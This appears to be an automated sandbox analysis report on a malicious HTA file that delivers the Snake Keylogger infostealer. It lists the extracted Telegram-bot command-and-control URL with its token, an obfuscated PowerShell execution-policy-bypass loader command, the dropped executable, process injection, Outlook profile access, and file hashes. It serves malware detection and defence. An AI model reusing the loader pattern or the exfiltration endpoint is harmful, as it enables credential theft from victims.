Analysis

  • max time kernel
    143s
  • max time network
    205s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16/10/2024, 01:40

General

  • Target

    16102024_0140_niceworkingprojectforeveryone.hta

  • Size

    165KB

  • MD5

    44ad3c49b38f4f6f1739baf86d528fd3

  • SHA1

    afcf27df0ee2373846a1f6b8027e9cfcea77c486

  • SHA256

    4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368

  • SHA512

    e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691

  • SSDEEP

    96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16102024_0140_niceworkingprojectforeveryone.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4228
    • C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE
      "C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'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'+[CHAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3172
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4168
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dq3dlhag\dq3dlhag.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4044
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9069.tmp" "c:\Users\Admin\AppData\Local\Temp\dq3dlhag\CSCB35195D17B1A407FB26BE3F434266FBE.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3636
      • C:\Users\Admin\AppData\Roaming\taskhostw.exe
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2364
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:1148
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 744
          4⤵
          • Program crash
          PID:536
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2364 -ip 2364
    1⤵
      PID:3232

    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoweRsHELl.ExE.log

            Filesize

            2KB

            MD5

            3d086a433708053f9bf9523e1d87a4e8

            SHA1

            b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

            SHA256

            6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

            SHA512

            931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            18KB

            MD5

            93aff0527ee852bd4f2758ff570a5bdd

            SHA1

            b2c2ec10c6e4227c42772d08246bfcc3054a707f

            SHA256

            63b2bd55be9abfbacc3e3de76d85d65fbbcb603662511d8cc27ad67fadc8c843

            SHA512

            b4be0c3b80c46f6c9c63748ac4e6c76e4853c4093cd201f6844560e05784386728c12fbde7a9f800ef147d7e715ac770b2cf98fb952ccfd3ee9a03bfba8568e9

          • C:\Users\Admin\AppData\Local\Temp\RES9069.tmp

            Filesize

            1KB

            MD5

            6477e6f0f98432e7062a98ae035d719d

            SHA1

            6f7f283a5edd8f65defd87d05df5a0bb4fdc1648

            SHA256

            ab3de7f0a290228a77605b599c4843c227a30c08e4b84ac3e604ee46cfa38d57

            SHA512

            9a69ba9a3fb093cccc63b47f68353efb11e9c65811efa3d2b704e68c7ccab99a13550cc8cb95072cf7b5df03cebdb629ac9de1404d84cd509cc01c5ab0f86def

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_35eytudp.rrb.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\dq3dlhag\dq3dlhag.dll

            Filesize

            3KB

            MD5

            c5e971606b36ef8ac72ae3bcb38999a0

            SHA1

            99d16e47077b23a073c43e8af25cc34bb759d358

            SHA256

            de910001bd7f26e9db5d21d3f374330bec8e05683d313faca2cbe00826481d14

            SHA512

            882720d24a5f4e1fe519801b23035ca4bc3ef96ec46fd71f33a1eed870136d4a2f5be010636538831cb6fcfec9664f97c243ac4baa0c454e8d6de3b0b4ecd0ce

          • C:\Users\Admin\AppData\Roaming\taskhostw.exe

            Filesize

            948KB

            MD5

            3e2f27edd3deacd8f08f6ed1133b2040

            SHA1

            060e3218949c5a006bb8607e8228e6539b737bfb

            SHA256

            163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86

            SHA512

            da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42

          • \??\c:\Users\Admin\AppData\Local\Temp\dq3dlhag\CSCB35195D17B1A407FB26BE3F434266FBE.TMP

            Filesize

            652B

            MD5

            3fe6ab35aa55017b445a67534b2aba81

            SHA1

            2b7a1729f880cf517f3e8a3d753c42f1496daaa7

            SHA256

            c80c593e93bf178016d47d1307b1584889fe9328429ae69453fdea9076272db9

            SHA512

            9178bd18bb93be708c5608dcc0ad0950d3ed143c9b41db091789464c6c2f132c0c9965bfa3826f49fbee332ae60e40048ff5a0ce0190c437f4f03d0a4e008900

          • \??\c:\Users\Admin\AppData\Local\Temp\dq3dlhag\dq3dlhag.0.cs

            Filesize

            475B

            MD5

            ecc2c10cb4c5954e2d5156bce54e41f4

            SHA1

            2d7cde31f9942c1dc80c493c03d675962991bf31

            SHA256

            21d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac

            SHA512

            bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96

          • \??\c:\Users\Admin\AppData\Local\Temp\dq3dlhag\dq3dlhag.cmdline

            Filesize

            369B

            MD5

            ce2ca4fde56c4f762eb195764e196332

            SHA1

            8beb6a3d549463ede47c2733af27229db814fdbd

            SHA256

            06fcbc079c63dde058bfe8c2cc733ac1f86aa4b0cfdc9864868016c4edeb57c7

            SHA512

            84f68ec0bf8ed38257a40e2f4bafec8dff9ab332568f36cf4b97fed7c5a771260de879dfeafc723f3aeb91e0e08d3d549da4bc963b2e911665d1c6a112ea820e

          • memory/1148-95-0x0000000006340000-0x0000000006502000-memory.dmp

            Filesize

            1.8MB

          • memory/1148-92-0x0000000000400000-0x0000000000426000-memory.dmp

            Filesize

            152KB

          • memory/1148-93-0x0000000004FA0000-0x000000000503C000-memory.dmp

            Filesize

            624KB

          • memory/1148-94-0x0000000006120000-0x0000000006170000-memory.dmp

            Filesize

            320KB

          • memory/1148-96-0x0000000006210000-0x00000000062A2000-memory.dmp

            Filesize

            584KB

          • memory/1148-97-0x00000000061D0000-0x00000000061DA000-memory.dmp

            Filesize

            40KB

          • memory/3172-73-0x0000000070C50000-0x0000000071400000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-17-0x00000000059B0000-0x0000000005D04000-memory.dmp

            Filesize

            3.3MB

          • memory/3172-1-0x0000000002670000-0x00000000026A6000-memory.dmp

            Filesize

            216KB

          • memory/3172-3-0x0000000070C50000-0x0000000071400000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-2-0x00000000051A0000-0x00000000057C8000-memory.dmp

            Filesize

            6.2MB

          • memory/3172-5-0x0000000004FB0000-0x0000000004FD2000-memory.dmp

            Filesize

            136KB

          • memory/3172-4-0x0000000070C50000-0x0000000071400000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-6-0x00000000058D0000-0x0000000005936000-memory.dmp

            Filesize

            408KB

          • memory/3172-89-0x0000000070C50000-0x0000000071400000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-7-0x0000000005940000-0x00000000059A6000-memory.dmp

            Filesize

            408KB

          • memory/3172-18-0x0000000005F80000-0x0000000005F9E000-memory.dmp

            Filesize

            120KB

          • memory/3172-75-0x0000000008410000-0x00000000089B4000-memory.dmp

            Filesize

            5.6MB

          • memory/3172-74-0x0000000007350000-0x0000000007372000-memory.dmp

            Filesize

            136KB

          • memory/3172-0-0x0000000070C5E000-0x0000000070C5F000-memory.dmp

            Filesize

            4KB

          • memory/3172-65-0x0000000006520000-0x0000000006528000-memory.dmp

            Filesize

            32KB

          • memory/3172-19-0x0000000005FB0000-0x0000000005FFC000-memory.dmp

            Filesize

            304KB

          • memory/3172-71-0x0000000070C5E000-0x0000000070C5F000-memory.dmp

            Filesize

            4KB

          • memory/3172-72-0x0000000070C50000-0x0000000071400000-memory.dmp

            Filesize

            7.7MB

          • memory/4168-49-0x0000000007C40000-0x0000000007C5A000-memory.dmp

            Filesize

            104KB

          • memory/4168-29-0x0000000007780000-0x00000000077B2000-memory.dmp

            Filesize

            200KB

          • memory/4168-40-0x0000000007760000-0x000000000777E000-memory.dmp

            Filesize

            120KB

          • memory/4168-41-0x00000000077D0000-0x0000000007873000-memory.dmp

            Filesize

            652KB

          • memory/4168-42-0x0000000007F50000-0x00000000085CA000-memory.dmp

            Filesize

            6.5MB

          • memory/4168-50-0x0000000007C20000-0x0000000007C28000-memory.dmp

            Filesize

            32KB

          • memory/4168-30-0x000000006D510000-0x000000006D55C000-memory.dmp

            Filesize

            304KB

          • memory/4168-48-0x0000000007B40000-0x0000000007B54000-memory.dmp

            Filesize

            80KB

          • memory/4168-47-0x0000000007B30000-0x0000000007B3E000-memory.dmp

            Filesize

            56KB

          • memory/4168-46-0x0000000007B00000-0x0000000007B11000-memory.dmp

            Filesize

            68KB

          • memory/4168-45-0x0000000007B80000-0x0000000007C16000-memory.dmp

            Filesize

            600KB

          • memory/4168-44-0x0000000007970000-0x000000000797A000-memory.dmp

            Filesize

            40KB

          • memory/4168-43-0x0000000007900000-0x000000000791A000-memory.dmp

            Filesize

            104KB